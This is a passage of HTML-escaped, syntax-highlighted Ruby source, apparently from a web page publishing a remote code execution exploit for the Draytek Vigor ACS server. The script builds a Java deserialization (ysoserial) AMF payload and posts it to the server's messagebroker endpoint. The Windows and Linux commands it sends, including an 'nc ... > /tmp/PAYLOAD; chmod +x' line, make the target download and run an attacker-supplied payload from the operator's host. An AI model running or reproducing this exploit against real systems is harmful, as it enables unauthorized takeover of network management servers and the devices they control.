class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-137\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;\trhost:tttDraytek Vigor ACS server host&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-138\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;\trport:tttDraytek Vigor ACS server port&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-139\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;\tlhost:tttyour IP address&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-140\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;\tWindows|Linux:tttarget type&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-141\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;\tpayload_path:ttPath to the payload that is going to be executed in the Vigor server&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-142\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;\tssl:tttConnects to Vigor server using SSL (by default uses plain HTTP)&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-143\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-144\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;NOTES:tThis exploit requires the ftpd gem installed and the java executable in the PATH.&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-145\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;tThe included ysoserial.jar (patched for multiarg) and the included acsFlex.jar must be in the current directory.&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-146\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;tTwo random TCP ports in the range 10000-65535 are used to receive connections from the target.&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-147\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-148\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-149\"><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-150\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-151\"><span class=\"crayon-c\"># we can use ysoserial&#8217;s CommonsCollections5 or CommonsCollections6 exploit chain<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-152\"><span class=\"crayon-v\">YSOSERIAL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ysoserial-patched.jar ysoserial.exploit.JRMPListener JRMP_PORT CommonsCollections6Chained &#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-153\"><span class=\"crayon-v\">WINDOWS_CMD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-k\">{<\/span><span class=\"crayon-s\">&#8216;cmd.exe \/c @echo open SERVER PORT&gt;script.txt&amp;@echo binary&gt;&gt;script.txt&amp;@echo get \/PAYLOAD&gt;&gt;script.txt&amp;@echo quit&gt;&gt;script.txt&amp;@ftp -s:script.txt -v -A&amp;@start PAYLOAD&#8217;<\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-154\"><span class=\"crayon-v\">LINUX_CMD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-k\">{<\/span><span class=\"crayon-sy\"><\/span>&#8216;<span class=\"crayon-v\">nc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">w<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">SERVER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PORT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">PAYLOAD<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">PAYLOAD<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">PAYLOAD<\/span><span class=\"crayon-sy\"><\/span>&#8216;<span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-155\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-156\"><span class=\"crayon-v\">rhost<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-157\"><span class=\"crayon-v\">rport<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-158\"><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">dup<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">force_encoding<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;ASCII&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-159\"><span class=\"crayon-v\">os<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-160\"><span class=\"crayon-v\">payload_path<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-161\"><span class=\"crayon-v\">payload_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">File<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">basename<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-162\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;ssl&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-163\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">ssl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">true<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-164\"><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-165\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">ssl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">false<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-166\"><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-167\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-168\"><span class=\"crayon-t\">Dir<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">mktmpdir<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">temp_dir<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-169\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">server_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10000..65535<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-170\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">FileUtils<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">cp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload_path<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">temp_dir<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-171\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-172\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Picked port #{server_port} for the #{(os == &#8216;Windows&#8217; ? &#8216;FTP&#8217; : &#8216;TCP&#8217;)} server&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cyan<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">bold<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-173\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-174\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\"># step 1: start the TCP or FTP server<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-175\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Windows&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-176\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">ftp_start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">temp_dir<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">server_port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-177\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-178\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Thread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">new<\/span><span class=\"crayon-k\">{<\/span><span class=\"crayon-e\">tcp_start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload_path<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">server_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-179\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-180\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-181\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\"># step 2: create the AMF payload<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-182\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Creating AMF payload&#8230;&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">green<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-183\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">jrmp_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10000..65535<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-184\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-185\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">amf_file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">temp_dir<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/payload.ser&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-186\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;java -jar acsFlex.jar #{lhost} #{jrmp_port} #{amf_file}&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-187\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">amf_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">File<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">binread<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">amf_file<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-188\"><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-189\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\"># step 3: start the ysoserial JRMP listener<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-190\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Picked port #{jrmp_port} for the JRMP server&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cyan<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">bold<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-191\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-192\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\"># build the command line argument that will be executed by the server<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-193\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Windows&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;java &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;java -Dysoserial.prefix=&#8217;\/bin\/sh -c&#8217; &#8220;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-194\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;-cp #{YSOSERIAL.gsub(&#8216;JRMP_PORT&#8217;, jrmp_port.to_s)}&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-195\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">cmd_final<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Windows&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WINDOWS_CMD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">LINUX_CMD<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;SERVER&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;PORT&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">server_port<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;PAYLOAD&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">payload_name<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-196\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Sending command #{cmd_final}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">green<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-197\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-198\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">jrmp_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">spawn<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd_final<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-199\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">sleep<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-200\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-k\">Process<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">detach<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">jrmp_pid<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-201\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-202\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\"># step 4: fire the payload!<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-203\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">uri<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">URI<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http#{ssl ? &#8216;s&#8217;: &#8221;}:\/\/#{rhost}:#{rport}&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-204\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-205\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">Net<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uri<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">uri<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">ssl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">use_ssl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">verify_mode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">OpenSSL<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">SSL<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">VERIFY<\/span><span class=\"crayon-sy\">_<\/span>NONE<span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><span class=\"crayon-k\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-206\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/ACSServer\/messagebroker\/amf&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">amf_payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-207\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-208\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-209\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] AMF payload sent, waiting 15 seconds for payload download&#8230;&#8221;<\/span><span 